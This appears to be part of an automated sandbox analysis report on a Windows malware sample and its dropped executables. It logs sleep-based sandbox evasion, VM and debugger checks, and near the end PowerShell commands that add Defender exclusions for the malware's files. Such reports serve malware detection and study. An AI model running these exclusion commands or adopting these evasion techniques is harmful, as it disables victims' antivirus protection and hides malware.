                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -599436s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -599148s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -599030s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598922s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598812s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598703s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598593s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598484s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598375s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598265s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598156s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -598047s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597922s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597811s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597703s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597593s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597484s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597374s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597265s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597152s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -597046s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596933s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596827s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596718s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596580s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596460s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596344s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596219s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -596108s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595999s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595880s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595750s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595637s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595530s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595421s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595312s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595203s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -595093s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594984s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594874s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594752s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594619s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594464s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594334s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594203s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -594093s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599873s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599765s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599655s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599547s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599422s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599280s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599170s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -599062s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598953s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598844s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598734s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598625s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598515s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598402s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598281s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598172s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -598062s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597943s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597812s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597703s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597594s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597469s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597359s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597250s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597140s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -597031s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596907s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596781s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596672s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596562s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596447s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596328s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596219s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596109s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -596000s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595890s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595765s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595655s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595547s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595437s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595328s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595219s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -595094s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -594984s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -594867s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -594750s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -594609s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -594314s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -594200s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -594078s >= -30000sJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128Thread sleep time: -593968s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 8641 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 885 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3304Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep count: 5767 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 1385 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4452Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep count: 7545 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2624Thread sleep count: 1648 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3108Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3372Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744Thread sleep count: 7559 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744Thread sleep count: 1982 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Systen User TID: 6084Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Users\user\adawsfaefasfasfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\wasdwasfwasfs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Systen UserFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599870Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599761Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599656Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599546Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599436Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599148Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599030Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598922Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598812Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598703Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598593Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598484Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598375Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598265Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598047Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597922Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597811Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597703Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597593Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597484Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597374Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597265Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597152Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597046Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596933Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596827Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596718Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596580Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596460Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596344Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596219Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596108Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595999Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595880Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595750Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595637Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595530Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595421Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595312Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595203Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595093Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594984Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594874Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594752Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594619Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594464Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594334Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594203Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594093Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599873Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599765Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599655Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599547Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599422Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599280Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599170Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599062Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598953Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598844Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598734Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598625Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598515Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598402Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598281Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598172Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598062Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597943Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597812Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597703Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597594Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597469Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597359Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597250Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597140Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597031Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596907Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596781Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596672Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596562Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596447Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596328Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596219Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596109Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596000Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595890Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595765Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595655Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595547Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595437Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595328Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595219Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595094Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594984Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594867Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594750Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594609Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594314Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594200Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594078Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 593968Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Systen UserThread delayed: delay time: 922337203685477
                            Source: Systen User.2.drBinary or memory string: vmware
                            Source: svchost.exe, 0000001F.00000002.2583747988.0000024CFE052000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2579519323.0000024CFC82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2631919617.000000001BF20000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2675303572.000000001BDC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Source: C:\Users\user\adawsfaefasfasfg.exeCode function: 2_2_00007FF887D27681 CheckRemoteDebuggerPresent,2_2_00007FF887D27681
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Systen UserProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'Jump to behavior
